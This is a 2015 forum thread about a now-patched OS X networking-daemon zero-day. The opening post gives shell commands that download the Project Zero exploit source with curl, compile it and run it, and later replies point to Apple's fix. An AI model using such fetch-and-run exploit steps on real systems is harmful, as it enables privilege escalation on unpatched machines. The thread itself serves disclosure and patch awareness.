Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

OS X Live Exploits


  • Please log in to reply
3 replies to this topic

#1 iangcarroll

iangcarroll

  • Members
  • 658 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Birmingham, MI
  • Local time:01:26 PM

Posted 22 January 2015 - 06:21 PM

OS X currently has at least one active "zero day" (it was released to the public after 90 days of no fix from Apple). It exploits in a flaw with the networking daemon to gain shell access.

 

This flaw is exploitable on =<10.9.5. Yosemite is not affected. More alarming is that no antivirus currently blocks this executable.

 

Source: https://code.google.com/p/google-security-research/issues/detail?id=121

 

Build the proof of concept:

gcc # launches dev tool installer if not present
mkdir /tmp/networkd_poc
cd /tmp/networkd_poc
git clone git@github.com:rodionovd/liblorgnette.git
curl 'https://google-security-research.googlecode.com/issues/attachment?aid=1210000000&name=sysmond_exploit_writeup.c&token=ABZ6GAe572CH9_WQUWSd2SBooTBV6ZZMjw%3A1421968517496' > networkd_exploit.c # may need to replace with your own link from https://code.google.com/p/google-security-research/issues/detail?id=121
clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation
./networkd_exploit
ls /tmp | grep hello_ # should see hello_networkd

Edited by iangcarroll, 22 January 2015 - 06:22 PM.

Ian Carroll https://ian.sh • Certly Inc
 
Member of the Bleeping Computer A.I.I. early response team!


BC AdBot (Login to Remove)

 


#2 Buddyme2

Buddyme2

  • Members
  • 700 posts
  • OFFLINE
  •  
  • Local time:09:26 AM

Posted 26 January 2015 - 05:13 AM

Better late than never.

 

Apple's OS X 10.10.2 to Fix Security Vulnerabilities Exposed by Google's Project Zero



#3 dante12

dante12

  • Members
  • 193 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:26 PM

Posted 28 January 2015 - 10:23 AM

The Current update close the flaws http://support.apple.com/kb/DL1785?viewlocale=de_DE&locale=de_DE 



#4 iangcarroll

iangcarroll
  • Topic Starter

  • Members
  • 658 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Birmingham, MI
  • Local time:01:26 PM

Posted 28 January 2015 - 06:10 PM

That's good. :)

 

Still curious why nobody flags this file (yet), hopefully heurstics would catch any sample in the wild... https://www.virustotal.com/en/file/c722515e3685750241af96690526bd8966483065e5b635e8c55efb8a3c847cd8/analysis/1422486572/


Ian Carroll https://ian.sh • Certly Inc
 
Member of the Bleeping Computer A.I.I. early response team!





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users